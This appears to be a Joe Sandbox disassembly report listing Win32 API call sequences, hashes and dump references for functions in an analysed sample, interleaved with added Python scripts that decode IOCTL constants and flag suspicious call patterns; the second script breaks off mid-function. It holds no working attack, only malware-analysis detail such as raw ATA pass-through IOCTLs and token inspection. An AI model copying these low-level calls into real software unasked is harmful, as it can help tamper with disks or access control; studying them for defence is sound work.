                                                                        • API String ID: 2169480361-0
                                                                        • Opcode ID: 40822dc024dc588862e1b667164d62a76bc4186c276dcd540ceda68e66224ae7
                                                                        • Instruction ID: 853b9a92ba1cf5cfae9c9d6c681bac3955bc4004d14c710c724d5c540da6419f
                                                                        • Opcode Fuzzy Hash: 40822dc024dc588862e1b667164d62a76bc4186c276dcd540ceda68e66224ae7
                                                                        • Instruction Fuzzy Hash: 2B117F31309111AFD745AB25CD05FBA77E9EF85321F14911AF92AEB2E2CB70AD01C794
                                                                        APIs
                                                                          • Part of subcall function 00EB1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00EB0ABB,?,?,?,00EB187A,00000000,000000EF,00000119,?,?), ref: 00EB1E77
                                                                          • Part of subcall function 00EB1E68: lstrcpyW.KERNEL32(00000000,?,?,00EB0ABB,?,?,?,00EB187A,00000000,000000EF,00000119,?,?,00000000), ref: 00EB1E9D
                                                                          • Part of subcall function 00EB1E68: lstrcmpiW.KERNEL32(00000000,?,00EB0ABB,?,?,?,00EB187A,00000000,000000EF,00000119,?,?), ref: 00EB1ECE
                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00EB187A,00000000,000000EF,00000119,?,?,00000000), ref: 00EB0AD4
                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00EB187A,00000000,000000EF,00000119,?,?,00000000), ref: 00EB0AFA
                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00EB187A,00000000,000000EF,00000119,?,?,00000000), ref: 00EB0B2E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                        • String ID: cdecl
                                                                        • API String ID: 4031866154-3896280584
                                                                        • Opcode ID: c29ffe6eb6569ea363abdb020d011cad28d0318525073e58fb8cd4f797f1c936
                                                                        • Instruction ID: 187b97edd5bba2784965fcada98ef4d5328072c8476fbc48cb57be4fb9b1d735
                                                                        • Opcode Fuzzy Hash: c29ffe6eb6569ea363abdb020d011cad28d0318525073e58fb8cd4f797f1c936
                                                                        • Instruction Fuzzy Hash: A511D336200305AFDB25AF64DC55DBB77A9FF45354B80506AE80ADB250EB71E850C7A0
                                                                        APIs
                                                                        • _free.LIBCMT ref: 00EA2FB5
                                                                          • Part of subcall function 00E9395C: __FF_MSGBANNER.LIBCMT ref: 00E93973
                                                                          • Part of subcall function 00E9395C: __NMSG_WRITE.LIBCMT ref: 00E9397A
                                                                          • Part of subcall function 00E9395C: RtlAllocateHeap.NTDLL(015C0000,00000000,00000001,00000001,00000000,?,?,00E8F507,?,0000000E), ref: 00E9399F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap_free
                                                                        • String ID:
                                                                        • API String ID: 614378929-0
                                                                        • Opcode ID: b84a1c62242a54d3bac58912e301293e6522e590f3d0cc02a9a2c4177c9f3f91
                                                                        • Instruction ID: 7e172fa8428bf61b45a340a8bfcf004d3f68e1dbb3ac24d0b70fd6db0c02962a
                                                                        • Opcode Fuzzy Hash: b84a1c62242a54d3bac58912e301293e6522e590f3d0cc02a9a2c4177c9f3f91
                                                                        • Instruction Fuzzy Hash: 9B113632509212AFCF313F74AC4466A7FE5AF4E364F216429FA88BE151CB30DC409690
APIs
• _memset.LIBCMT ref: 00E8EBB2
  • Part of subcall function 00E751AF: _memset.LIBCMT ref: 00E7522F
  • Part of subcall function 00E751AF: _wcscpy.LIBCMT ref: 00E75283
  • Part of subcall function 00E751AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E75293
• KillTimer.USER32(?,00000001,?,?), ref: 00E8EC07
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E8EC16
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EE3C88
Memory Dump Source
• Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
• Opcode ID: fb8721dca0869c8083fadcbc2c31f71998063ca058843f925c8aa5866cf017b8
• Instruction ID: 1872527c5032818059fde0b1ac77071d7d627ec84fef344ad24f699b9958c56d
• Opcode Fuzzy Hash: fb8721dca0869c8083fadcbc2c31f71998063ca058843f925c8aa5866cf017b8
• Instruction Fuzzy Hash: 5221B3709047D8AFE7329B388C59BEAFBED9B41308F14148DE69E77281C3746A84CB51
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00EB05AC
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00EB05C7
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00EB05DD
• FreeLibrary.KERNEL32(?), ref: 00EB0632
Memory Dump Source
• Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
Similarity
• API ID: Type$FileFreeLibraryLoadModuleNameRegister
• String ID:
• API String ID: 3137044355-0
• Opcode ID: 24a054d2dbe09fff00d3c009df510c0b8b8848b5e1eb0e0c6f7a5766a61c587b
• Instruction ID: 987b9999edb3099c4777f247084ea5089a9c00e7736b8f8000ad601e547a7224
• Opcode Fuzzy Hash: 24a054d2dbe09fff00d3c009df510c0b8b8848b5e1eb0e0c6f7a5766a61c587b
• Instruction Fuzzy Hash: F1217F71901209EFDB209F96DC88AEBBBB8EF80704F0094A9E556B2454D770FA59DF50
APIs
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00EB6733
• _memset.LIBCMT ref: 00EB6754
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00EB67A6
• CloseHandle.KERNEL32(00000000), ref: 00EB67AF
Memory Dump Source
• Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle_memset
• String ID:
• API String ID: 1157408455-0
• Opcode ID: 4c5459563bae16e1b375aae62928efea594c68173405f6258d503d4a296f94fc
• Instruction ID: 632357667e0a76fdaece86546c4fbeac2f4fd7115da0706a703f2e31d83c279d
• Opcode Fuzzy Hash: 4c5459563bae16e1b375aae62928efea594c68173405f6258d503d4a296f94fc
• Instruction Fuzzy Hash: 8B11A3769012287BE7209BA5AC4DFEFBABCEF44764F10419AF504F7190D6744E84CBA4
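The CreateFileW and DeviceIoControl arguments in the record above are printed as raw hex, and the interesting part of this function is what those values mean. The script below is an added example for triage, not code from the report or from the sample: it decodes the arguments from the Windows SDK definitions. 0xC0000000 / 3 / 3 is GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING, and 0x0004D02C splits into device type 4 (FILE_DEVICE_CONTROLLER, which ntddscsi.h uses as IOCTL_SCSI_BASE), function 0x40B, METHOD_BUFFERED, read+write access, which is IOCTL_ATA_PASS_THROUGH. The path argument is shown as `?`, so the report does not establish which device is opened; the short IOCTL name table is the editor's own selection, not a complete list.

```python
"""Decode the raw Win32 constants shown for the CreateFileW / DeviceIoControl
pair at 00EB6733 / 00EB67A6.  Added triage helper, not code from the report or
from the sample; the field layout and constant values come from the Windows SDK
headers (winioctl.h, ntddscsi.h, winnt.h, fileapi.h)."""
from dataclasses import dataclass

# CTL_CODE(DeviceType, Function, Method, Access) packs as
#   DeviceType << 16 | Access << 14 | Function << 2 | Method
DEVICE_TYPES = {
    0x04: "FILE_DEVICE_CONTROLLER (IOCTL_SCSI_BASE)",
    0x07: "FILE_DEVICE_DISK",
    0x09: "FILE_DEVICE_FILE_SYSTEM",
    0x2D: "FILE_DEVICE_MASS_STORAGE",
}
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
ACCESS = ["FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
          "FILE_READ_ACCESS|FILE_WRITE_ACCESS"]
# A few codes worth recognising on sight; each value computed from its CTL_CODE definition.
KNOWN_IOCTLS = {
    0x0004D004: "IOCTL_SCSI_PASS_THROUGH",
    0x0004D014: "IOCTL_SCSI_PASS_THROUGH_DIRECT",
    0x0004D02C: "IOCTL_ATA_PASS_THROUGH",
    0x0007405C: "IOCTL_DISK_GET_LENGTH_INFO",
    0x002D1400: "IOCTL_STORAGE_QUERY_PROPERTY",
}
# CreateFileW argument tables.
DESIRED_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


@dataclass(frozen=True)
class Ioctl:
    code: int
    device_type: int
    access: int
    function: int
    method: int
    name: str


def decode_ioctl(code: int) -> Ioctl:
    """Split a CTL_CODE value into its four fields and name it when it is a known code."""
    return Ioctl(code=code,
                 device_type=(code >> 16) & 0xFFFF,
                 access=(code >> 14) & 0x3,
                 function=(code >> 2) & 0xFFF,
                 method=code & 0x3,
                 name=KNOWN_IOCTLS.get(code, "unknown"))


def decode_flags(value: int, table: dict) -> list:
    """Expand a bitmask into symbolic names; bits not in the table are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return names


def describe_open(desired_access: int, share_mode: int, disposition: int) -> str:
    """Render the three CreateFileW arguments the sandbox prints as raw hex."""
    return "CreateFileW(%s, share=%s, %s)" % (
        "|".join(decode_flags(desired_access, DESIRED_ACCESS)) or "0",
        "|".join(decode_flags(share_mode, SHARE_MODE)) or "0",
        DISPOSITION.get(disposition, hex(disposition)))


def describe_ioctl(code: int) -> str:
    io = decode_ioctl(code)
    dev = DEVICE_TYPES.get(io.device_type, hex(io.device_type))
    return "%#010x = %s: device=%s function=%#x %s %s" % (
        io.code, io.name, dev, io.function, METHODS[io.method], ACCESS[io.access])


if __name__ == "__main__":
    # Argument values exactly as the report lists them for this function.
    print(describe_open(0xC0000000, 0x00000003, 0x00000003))
    print(describe_ioctl(0x0004D02C))
```

Run it as a script and it prints the decoded open and the decoded IOCTL for the two calls in the record; `decode_ioctl` works for any CTL_CODE value, and unknown codes still come back with their device type, function number, method and access split out.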
APIs
  • Part of subcall function 00EAAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EAAA79
  • Part of subcall function 00EAAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EAAA83
  • Part of subcall function 00EAAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EAAA92
  • Part of subcall function 00EAAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EAAA99
  • Part of subcall function 00EAAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EAAAAF
• GetLengthSid.ADVAPI32(?,00000000,00EAADE4,?,?), ref: 00EAB21B
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 00EAB227
• HeapAlloc.KERNEL32(00000000), ref: 00EAB22E
• CopySid.ADVAPI32(?,00000000,?), ref: 00EAB247
Memory Dump Source
• Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
Similarity
• API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
• String ID:
• API String ID: 4217664535-0
• Opcode ID: 45414ca4a9f9148243220654397953ae93002c29a39ab28f9f0648695cef7c41
• Instruction ID: 4ecb1fe03547493dad501828f5a3517d1cc2a875f313fd603b90d893c1c015b3
• Opcode Fuzzy Hash: 45414ca4a9f9148243220654397953ae93002c29a39ab28f9f0648695cef7c41
• Instruction Fuzzy Hash: 19118671900205AFDB149F54DC45BBFB7A9EF8A308B14502EE546EB221D735AE44CB20
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00EAB498
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EAB4AA
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EAB4C0
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EAB4DB
Memory Dump Source
• Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 4730aaa8016f8ec1fcd5a14060a854fd97d16954ddcd74013858fbd3229045df
• Instruction ID: a678072f4ebae1683abae34b5b423491d16102d14450272075724cc72daa1e63
• Opcode Fuzzy Hash: 4730aaa8016f8ec1fcd5a14060a854fd97d16954ddcd74013858fbd3229045df
• Instruction Fuzzy Hash: 4B11367A900218BFDB11DBA9C881E9DBBB4FB09710F204091E614BB291D771AE10DB94
APIs
  • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
• DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00E8B5A5
• GetClientRect.USER32(?,?), ref: 00EEE69A
• GetCursorPos.USER32(?), ref: 00EEE6A4
• ScreenToClient.USER32(?,?), ref: 00EEE6AF
Memory Dump Source
• Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: 5fe6f767a69c34f12a0743ee21e40312c61dadc31472c8027ca86e53013e2549
• Instruction ID: f74bc0b5b1409bb030dc148f74abec3c8f002ce0767c06372910815751e60ca7
• Opcode Fuzzy Hash: 5fe6f767a69c34f12a0743ee21e40312c61dadc31472c8027ca86e53013e2549
• Instruction Fuzzy Hash: 0111363190002ABFCB10EF95DC469FE7BBAEB49308F101451E909F7240D330AA86CBA5
APIs
• GetCurrentThreadId.KERNEL32 ref: 00EB7352
• MessageBoxW.USER32(?,?,?,?), ref: 00EB7385
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00EB739B
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00EB73A2
Memory Dump Source
• Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: 3240737a36dcf609c383eaa42b3f3abd2426365f94e2b5cbf0fd88585846a517
• Instruction ID: 04b6ae8660e04fc0b94cada821177aee9e60123806d51b6ddd6187b868af8595
• Opcode Fuzzy Hash: 3240737a36dcf609c383eaa42b3f3abd2426365f94e2b5cbf0fd88585846a517
• Instruction Fuzzy Hash: 5911E572A08208AFCB01DB699C05AEF7FEE9B85324F044255F921F3261D670C90497A0
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E8D1BA
• GetStockObject.GDI32(00000011), ref: 00E8D1CE
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00E8D1D8
Memory Dump Source
• Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
• Opcode ID: d0ad5d7466bc3da6cc89186e1e52a906d7fb1cd1b2275b7f00a3d26bb3628562
• Instruction ID: 60598b109f9528b38583c5ef1e4438968aacc1bdb0c3e4b533bcc1c49067e722
• Opcode Fuzzy Hash: d0ad5d7466bc3da6cc89186e1e52a906d7fb1cd1b2275b7f00a3d26bb3628562
• Instruction Fuzzy Hash: AA11A57210650DBFEB015F919C58EEABF6EFF48364F041101FA0961190C7319C50DB90
APIs
Memory Dump Source
• Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
• Instruction ID: 62f82703a9af62c15b3c5b61eec1972319c54d98ea52f385c7a556d267708e43
• Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
• Instruction Fuzzy Hash: DB0178B200014EBBCF125E84DC018EE3F62BB5E354B489415FA286D070D376EAB2AB81
APIs
  • Part of subcall function 00E97A0D: __getptd_noexit.LIBCMT ref: 00E97A0E
• __lock.LIBCMT ref: 00E9748F
• InterlockedDecrement.KERNEL32(?), ref: 00E974AC
• _free.LIBCMT ref: 00E974BF
• InterlockedIncrement.KERNEL32(015D3618), ref: 00E974D7
Memory Dump Source
• Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
Similarity
• API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
• String ID:
• API String ID: 2704283638-0
• Opcode ID: f4c1dc7d97c1eb0abf56b318a24048897792ad24606608183cd74abe97ca57b3
• Instruction ID: 63286bb5505f94ee9bd5204ee83dda5171dd7483aa26d0bd44df4233e7781f89
• Opcode Fuzzy Hash: f4c1dc7d97c1eb0abf56b318a24048897792ad24606608183cd74abe97ca57b3
• Instruction Fuzzy Hash: 1201F93191A726ABCF21AF25A80579DBBA0BF04B14F145005F4A4B3682C7345D45DFC2
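This listing runs to hundreds of records in the same layout, so the first thing an analyst wants is a way to pull the call sequences out and rank the functions rather than read them one by one. The script below is an added example, not part of the report or of the sample: it parses records laid out as on this page and flags the functions whose calls match a short watchlist or an ordered pair, such as CreateFileW followed by DeviceIoControl. SAMPLE is a constructed excerpt that abbreviates four records from this page (call lines, API IDs and Opcode IDs copied verbatim, the other fields dropped); the watchlist and the sequence rules are the editor's own choices for illustration, not anything the report defines.

```python
"""Pull the per-function API records out of a Joe Sandbox listing laid out like this
page and flag the functions whose call sequence deserves a closer look.  Added triage
script, not code from the report; SAMPLE is a constructed excerpt abbreviating four
records on this page (call lines, API IDs and Opcode IDs copied verbatim)."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00EB6733
• _memset.LIBCMT ref: 00EB6754
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00EB67A6
• CloseHandle.KERNEL32(00000000), ref: 00EB67AF
• Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
Similarity
• API ID: CloseControlCreateDeviceFileHandle_memset
• Opcode ID: 4c5459563bae16e1b375aae62928efea594c68173405f6258d503d4a296f94fc
APIs
  • Part of subcall function 00EAAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EAAA79
• GetLengthSid.ADVAPI32(?,00000000,00EAADE4,?,?), ref: 00EAB21B
• CopySid.ADVAPI32(?,00000000,?), ref: 00EAB247
• API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
• Opcode ID: 45414ca4a9f9148243220654397953ae93002c29a39ab28f9f0648695cef7c41
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00EAB498
• API ID: MessageSend
• Opcode ID: 4730aaa8016f8ec1fcd5a14060a854fd97d16954ddcd74013858fbd3229045df
APIs
• _memset.LIBCMT ref: 00EDE33D
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F33D00,00F33D44), ref: 00EDE37B
• CloseHandle.KERNEL32 ref: 00EDE38D
• API ID: _memset$CloseCreateHandleProcess
• Opcode ID: 7f557d4beba812cf2b042e8999c97f1f3dff834ea74c1876e004368b6b8b3d80
"""

# One call line, "• Api.MODULE(args), ref: ADDR", optionally behind the subcall marker.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
FIELD_RE = re.compile(r"^•\s*(API ID|Opcode ID): ?(.*)$")

@dataclass
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: str
    subcall_of: "str | None" = None  # callee address when listed under "Part of subcall function"

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    api_id: str = ""
    opcode_id: str = ""

def parse_records(text: str) -> list:
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                   # every function record opens with this header
            cur = FunctionRecord()
            records.append(cur)
        elif cur is None:
            continue
        elif (m := API_RE.match(line)):
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            cur.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
        elif (m := FIELD_RE.match(line)):   # "API ID" -> api_id, "Opcode ID" -> opcode_id
            setattr(cur, m[1].lower().replace(" ", "_"), m[2].strip())
    return records                           # anything else (dump paths, hashes) is skipped

# Single calls worth a look, and ordered pairs that mean more than either call alone.
WATCHLIST = {"CreateProcessW": "spawns a process",
             "DeviceIoControl": "talks to a device driver directly",
             "GetTokenInformation": "inspects an access token"}
SEQUENCES = [(("CreateFileW", "DeviceIoControl"), "opens a handle and sends an IOCTL to it"),
             (("GetTokenInformation", "CopySid"), "copies a SID out of the token"),
             (("CreateProcessW", "CloseHandle"), "spawns a process and drops the handle")]
Hit = namedtuple("Hit", "api_id opcode_id reasons")

def has_subsequence(seq, pattern) -> bool:
    """True when every element of pattern occurs in seq in that order, gaps allowed."""
    it = iter(seq)
    return all(any(x == p for x in it) for p in pattern)

def flag_records(records) -> list:
    hits = []
    for rec in records:
        apis = [c.api for c in rec.calls]    # subcalls count too: they run under this function
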